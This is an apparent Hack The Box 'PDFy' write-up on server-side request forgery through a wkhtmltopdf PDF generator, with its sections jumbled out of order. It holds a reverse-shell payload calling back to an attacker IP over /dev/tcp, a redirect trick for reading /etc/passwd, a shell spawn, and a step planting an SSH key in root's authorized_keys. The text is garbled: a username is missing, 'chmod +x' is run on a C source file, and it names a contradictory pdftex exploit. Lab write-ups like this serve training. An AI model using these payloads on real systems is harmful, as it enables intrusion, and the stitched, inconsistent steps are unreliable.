Pdfy Htb Writeup Upd

Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named .

4. Pivoting to the User Flag

User-controlled input should never be passed directly to backend rendering engines or system commands without rigorous sanitization and validation.

This effectively bypasses the application's external URL filter because the initial input URL looks completely safe and external to the application's validator.

3. Exploit Strategy & Setup

[Attacker] ---> Post URL (Exploit Server) ---> [PDFy Web Server]
                                                      |
                                              Follows 302 Redirect
                                                      v
[Attacker Flag] <--- Generates PDF <--- Reads file:///etc/passwd

🔍 Step 1: Initial Reconnaissance & Code Review

<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>">

Alternative: The script runs as root, so we can write an SSH key into /root/.ssh/authorized_keys .

For a writeup of the challenge on Hack The Box (HTB), the primary vulnerability lies in an SSRF (Server-Side Request Forgery) found in the PDF generation process. The application uses the wkhtmltopdf tool, which can be manipulated to interact with internal resources.

Challenge Overview


$ python -c 'import os; os.system("/bin/bash")'
pdfy@pdfy:/$ sudo -l
Matching Defaults entries for pdfy on pdfy:
    env_reset, env_keep += "COLORFGBG KDEDIR", mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

→ Unsafe concatenation.

The main page presents a simple interface where you can input a URL (e.g., https://example.com) and receive a generated PDF. The PDF is saved on the server and displayed back to the user.

chmod +x dirty_pipe.c

However, for PDFY specifically, the working exploit often involves pdftex and \write18.

The system will bypass front-end controls, hit your server, follow the 302 Redirect, load the target internal file, and embed its contents right into the generated document.

3. Read the Flag
